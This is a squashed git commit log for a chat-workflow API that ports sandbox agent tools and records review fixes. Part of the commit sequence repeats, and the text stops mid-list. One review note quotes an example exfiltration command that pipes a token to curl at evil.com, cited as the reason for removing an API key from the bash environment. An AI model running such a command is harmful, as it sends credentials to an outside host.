* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so
the workflow agent gets the model wrap-up turn after a tool call (model
→ tool → tool-result → model → text response), instead of stopping at
streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:

- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts.
  Inherits the value that /api/chat already uses (originally hardcoded
  in getGeneralAgent.ts:55) — high enough that normal flows never hit
  the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant
  instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to
  streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent,
createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`
— they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585)

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools
from open-agents/packages/agent/tools/. Each is a direct port adapted
to api's Sandbox interface, registered in buildAgentTools, and ready
for the agent to invoke through the existing experimental_context
plumbing.

New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB

New helpers (utilities used by multiple tools):
- shellEscape.ts — `'` → `'\''` dance
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite
tools (`task`, `ask_user_question`, `skill`) need subagent context /
UI rendering / skill discovery infrastructure not in api today and
land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite
3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})`
factories while two (todoWriteTool, webFetchTool) were direct values.
The split was a vestigial copy from open-agents where the factory
pattern only made sense for tools that took options (originally bash's
ToolOptions, which sweetman had me remove in PR 4 review).

AI SDK's `tool()` helper returns a plain value with no per-call state,
so the factory wrappers added nothing. Harmonized to direct-value
exports across all 8 tools:

- bashTool, readFileTool, writeFileTool, editFileTool, grepTool,
  globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).

Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587)

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill
discovery layer it depends on. The handler now connects to the sandbox
before workflow start, scans `${workingDirectory}/skills/` for project-
level skills, and threads the catalog into the workflow via
`AgentContext.skills`. The `skill` tool is registered in
`buildAgentTools` only when the catalog is non-empty — so models in
sandboxes without skills never see the tool.

New skills layer (lib/skills/):
- skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema,
  frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts — hand-rolled YAML subset parser
  (key:value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts — strip frontmatter, return body
- substituteArguments.ts — $ARGUMENTS replacement
- injectSkillDirectory.ts — prepend `Skill directory: <path>`
- discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name,
  drop names that shadow built-in /model /resume /new
- getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]`
  only. Global skills (~/.skills) port later alongside short-lived
  token minting

New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup,
respects `disable-model-invocation`, surfaces available-skills list
on unknown name. Loads SKILL.md content, applies extractSkillBody →
injectSkillDirectory → substituteArguments, returns to the model.

Wire-up:
- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }`, registers skill tool when
  non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects sandbox + discoverSkills before
  start(workflow); empty catalog on discovery failure (best-effort,
  never blocks the request)

Slim scope decisions:
- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting; the recoup-api skill would still
  load + return content, but its curl examples wouldn't authenticate
  without ad-hoc credentials. Token minting becomes a separate PR
  where it can be designed properly (Privy JWT vs server-minted JWT
  scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2
injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills +
7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass;
lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/
— a path that doesn't exist in real recoupable sandboxes. The actual
layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):

  - \${workingDirectory}/.claude/skills/   (project, claude-style)
  - \${workingDirectory}/.agents/skills/   (project, agents-style)
  - \${HOME}/.agents/skills/               (global; populated at
                                           provisioning by
                                           installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine
WITHOUT short-lived token minting. The skill tool returns SKILL.md
content to the model; only the curl examples *inside* SKILL.md need
auth credentials, and those can be supplied ad-hoc until proper
token minting lands.

Changes:
- getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory
  to find the sandbox's actual $HOME — defaults to /root)
- exports the two sub-functions (getProjectSkillDirectories +
  getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + $HOME variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific)
DOES show skills in open-agents — proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are
   provisioned globally via `installSessionGlobalSkills` at sandbox
   startup — org repos do NOT bundle their own skill directories.
   getSandboxSkillDirectories now returns just the single global
   path: \`\${HOME}/.agents/skills\`. Deleted getProjectSkillDirectories
   and the PROJECT_SKILL_BASE_FOLDERS array.

2. **SRP: extract getSkills into its own file.** Previously inline in
   skillTool.ts (per sweetman comment on PR 587). Now lives at
   lib/skills/getSkills.ts with its own tests. Future skill-aware
   consumers (e.g. system-prompt builders) share the same accessor
   instead of duplicating the context-cast.

Verified live on preview against \`recoupable/org-rostrum-pacific-...\`
BEFORE this commit:
  - Sandbox provisioning installs 2 globals at
    /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
  - Agent invoked \`skill({ skill: "recoup-api" })\` successfully,
    received 11,173 chars of SKILL.md content with the correct
    "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api"
    header

Full suite 3055/3055; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each
helper now lives in its own file with its own focused test suite:

- lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null
    when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts — was inlined in
  getSandboxSkillDirectories.ts
  - 2 new unit tests (standard path, trailing-slash tolerance)

discoverSkills now imports findSkillFile. getSandboxSkillDirectories
imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories
test loses its inline getGlobalSkillsDirectory cases (those moved to
the dedicated test file).

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589)

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7)

Completes the open-agents tool surface. The agent now has all 11 tools.

**ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) —
client-side tool with NO server execute. Schema mirrors open-agents
verbatim (questions array, options with label/description, multiSelect
flag, max 12-char header). streamText halts after emitting the tool-
call because there's no result to feed back; the chat UI renders the
question component, collects answers, and submits them in the next
workflow request's messages array. No WDK pause/resume hook needed.

**task** (lib/agent/tools/taskTool.ts) — slim port of open-agents'
multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub-
`streamText` loop with a curated subagent tool set (`read, write,
edit, grep, glob, bash`) matching open-agents' `executor` subagent.

The subagent tool set deliberately EXCLUDES:
- task (recursion guard — open-agents' three subagent types
  executor/explorer/design all explicitly omit task too; subagents
  are leaves of the agent tree)
- ask_user_question, skill, todo_write, web_fetch (parity with
  open-agents subagent curation; subagents run autonomously, don't
  plan from scratch, don't make web calls, don't load further skills)

AgentContext gains `modelId?: string` so the subagent can use the
same model as its parent. Handler populates it from chat.model_id
or the platform default.

buildAgentTools registers both new tools unconditionally (skill stays
conditional on a non-empty catalog).

Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output)
directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165
does. askUserQuestionTool uses the direct signature.

Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools
+ AgentContext updates. Full suite 3075/3075 pass, lint clean,
production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(task-tool): provide non-empty subagent prompt

The subagent's streamText was invoked with messages: [] and only a
system prompt, so the AI SDK recorded zero steps and threw
NoOutputGeneratedError — surfaced to the parent as "Subagent failed:
No output generated. Check the stream for errors."

Pass an explicit user-side trigger prompt, mirroring open-agents'
task tool. Adds a regression test that asserts streamText receives
either a non-empty prompt or non-empty messages.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS)

Address PR review feedback:

- SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts
  (one exported function per file).
- KISS: open-agents' AgentContext type does not have modelId — it uses
  model: LanguageModel / subagentModel?: LanguageModel. api can't follow
  that exact shape because agentContext is part of a durable Vercel
  Workflow input and LanguageModel objects aren't JSON-serializable.
  Instead of inventing modelId on AgentContext, hardcode a default
  subagent model id in taskTool. A subagentModelId override field can
  be added if/when a real consumer needs it.

Also format-fixes askUserQuestionTool.ts toModelOutput arrow
(parentheses around single param flagged by prettier in CI).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent): align AgentContext + model resolution with open-agents

Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent
inherits the parent's model (rather than the previous hardcoded
SUBAGENT_MODEL_ID):

- AgentContext gains `model: LanguageModel` (required) and
  `subagentModel?: LanguageModel`, mirroring open-agents.
- Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel">
  for the workflow input shape, since LanguageModel instances aren't
  JSON-serializable and can't ride durable Vercel Workflow inputs.
- runAgentStep constructs `callModel = gateway(input.modelId)` once
  per step and merges it into experimental_context — same pattern as
  open-agents' prepareCall in open-harness-agent.ts.
- New getMainModel / getSubagentModel helpers (SRP, one per file)
  mirror open-agents' utility functions: getSubagentModel returns
  `ctx.subagentModel ?? ctx.model`.
- taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls
  getSubagentModel(experimental_context, "task") instead — subagent
  now defaults to the same model the parent is running.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): emit per-message cost/usage metadata (cutover Bundle C) (#592)

* feat(chat-workflow): emit per-message cost/usage metadata (Bundle C)

First step in the open-agents → api cutover sequence. Adds a
messageMetadata callback to runAgentStep's toUIMessageStream call so
the UI receives {modelId, lastStepUsage, totalMessageUsage,
lastStepCost, totalMessageCost, stepFinishReasons} on every assistant
turn — matching open-agents' WebAgentMessageMetadata shape byte-for-byte
so sandbox.recoupable.com's model/cost badges keep working when cut
over to /api/chat/workflow.

New (SRP, one function per file):
- lib/agent/messageMetadata/extractGatewayCost.ts — port of
  open-agents' gateway-metadata.ts, parses gateway-reported per-step
  cost from providerMetadata.
- lib/agent/messageMetadata/addLanguageModelUsage.ts — port of
  open-agents' usage.ts, pointwise-sums LanguageModelUsage records.
- lib/agent/messageMetadata/AgentMessageMetadata.ts — type mirroring
  open-agents' WebAgentMessageMetadata.
- lib/agent/messageMetadata/buildMessageMetadataCallback.ts —
  stateful factory returning a fresh callback per turn; accumulates
  usage + cost across finish-step parts.

Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called
this out as a known gap from the original workflow port (PR 4).

Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage

Address PR review feedback (one exported function per file) and adopt
the user's preferred path of upgrading api's `ai` package rather than
maintaining a normalization shim:

- Extract addTokenCounts.ts (used by addLanguageModelUsage)
- Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by
  extractGatewayCost)
- Split AgentStepFinishMetadata into its own file (was co-located
  in AgentMessageMetadata)

Upgrade the AI SDK so the wire format matches open-agents natively:
- ai: 6.0.0-beta.122 → ^6.0.190
- @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai,
  @ai-sdk/mcp: all bumped to latest stable

The new SDK's LanguageModelUsage is the flat shape (top-level
`inputTokens` number + nested `inputTokenDetails`) — identical to
open-agents' wire format. No conversion needed, so:
- Delete normalizeUsage.ts + test (net -82 LOC)
- Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage
  directly)

Production code changes for the SDK upgrade:
- runAgentStep + setupChatRequest: await convertToModelMessages
  (now returns Promise<ModelMessage[]>)

Tests: 3106/3106 pass; production typecheck clean; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
sweetmantech added a commit to recoupable/api that referenced this pull request May 22, 2026
* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581)

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow
agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones
(`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired —
the workflow runs streamText with the gateway model + Recoup custom
instructions only. Sandbox tool surface comes in a follow-up PR.

What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile
  existing active_stream_id (resume / 409 / fall-through) → refresh
  lifecycle activity → fire-and-forget persist user message → start
  runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) →
  return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3
createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest +
6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored).
Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools).
Without tools, `finishReason` is always "stop" after one turn — the
runAgentWorkflow loop shape is in place but only iterates once today.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts →
  app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate
    on active_stream_id. Subsumes compareAndSetChatActiveStreamId and
    touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces
    domain-specific isFirstChatMessage. The "is earliest?" check now
    lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a
    discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so
    callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts`
  (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a
  `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the
  race where two requests could both bill the model before one lost the
  CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}`
  so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer
  clears stale active_stream_id on transient workflow API failures —
  we treat any uncertainty as conflict. Failed CAS-clear on a completed
  run also returns conflict (rather than possibly falling through to
  ready on a DB read error).
- await getRun(runId).cancel() in handler — previously synchronous +
  unawaited cancellation could escape the try/catch.

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes
  id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH
  exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to
  body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer
  acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading
  lands with tool ports (PR 4). Multi-turn loop with the same input was
  unsafe — log+warn if model returns tool-calls and exit.

Tests reworked: 231 in the touched files all green; full suite 2949/2949;
lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was
a carry-over from open-agents — handleChatWorkflowStream.ts already
top-level imports `start` and `getRun` from the same package, so there's
no reason for the lib to defer. Moving to a normal top-level import for
consistency.

Also tightens the cancel-throws handler test to use the same deferred-
rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's
unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific
predicate logic doesn't belong in the Supabase plumbing. Restructured:

- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts
  `where: Partial<Tables<"chats">>` (a generic predicate that maps to
  `column = value` or `column IS NULL`) so no column name is hardcoded
  in the Supabase lib.

- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper.
  Owns the "compare-and-set on active_stream_id" concept and returns a
  discriminated `{ok, claimed} | {ok: false, error}` result. Handler
  and reconcileExistingActiveStream both compose against this wrapper
  instead of constructing predicates inline.

- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test +
tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's
errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }`
   narrowing wasn't kicking in under Next.js's strict TS plugin.
   Switched to `if ("error" in result)` (in-operator narrowing) which
   reliably discriminates the union members regardless of literal-type
   inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...)
   .update(...).eq(...)` + reassignment in a `for` loop (`.is()` /
   `.eq()` per where entry) caused "type instantiation is excessively
   deep" — Supabase's PostgrestFilterBuilder is heavily generic and the
   reassignment kept expanding the type. Rewrote as: split where map
   into equality matches (one `.match(obj)` call) + nullable columns
   (reduced with `.is(col, null)` typed back to the original builder).

Both bugs were behavior-neutral — the function shape and contract are
unchanged. 37/37 tests in touched files green; full suite 2955/2955;
lint clean; `pnpm build` now succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583)

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it
through the workflow via streamText's `experimental_context`. Proves
the entire tool-execution machinery works end-to-end. The remaining 10
tools (read, write, grep, glob, todo, task, ask_user_question, skill,
fetch + utils) port in a follow-up; this PR's scope was deliberately
held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard,
  getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN,
  RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts
  adapted to api's Sandbox interface. Injects recoup env on foreground
  execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool
  record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as
  experimental_context, and uses streamText's internal multi-step loop
  (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop
  in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url
  via extractOrgId, builds AgentContext with session.sandbox_state +
  validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory
+ 3 workflow file updates picked up by existing tests). Full suite
2978/2978 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's
  default stop condition handles tool-call iteration without an
  arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from
  bashTool. All model-issued commands are trusted in this PR — host-
  side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1
  about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler +
  buildRecoupExecEnv. Handing the long-lived api key to bash would let
  any model-issued command exfiltrate it via env (`echo $TOKEN | curl
  evil.com`). Slim PR 4 has no actual consumer for the token — only
  the future `skill` tool needs it. Proper short-lived token minting
  will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate
  sandbox.state is a non-null object AND sandbox.workingDirectory is a
  non-empty string. Earlier guard returned true for `{ sandbox: {} }`,
  letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's
  deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo
  has no enforced max-lines rule; existing tests routinely exceed 700
  lines.

Tests updated for the new shape. 25 tests in touched files green
(8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv +
2 factory). Full suite 2980/2980 pass; lint clean; production build
succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so
the workflow agent gets the model wrap-up turn after a tool call (model
→ tool → tool-result → model → text response), instead of stopping at
streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:

- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts.
  Inherits the value that /api/chat already uses (originally hardcoded
  in getGeneralAgent.ts:55) — high enough that normal flows never hit
  the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant
  instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to
  streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent,
createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`
— they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585)

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools
from open-agents/packages/agent/tools/. Each is a direct port adapted
to api's Sandbox interface, registered in buildAgentTools, and ready
for the agent to invoke through the existing experimental_context
plumbing.

New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB

New helpers (utilities used by multiple tools):
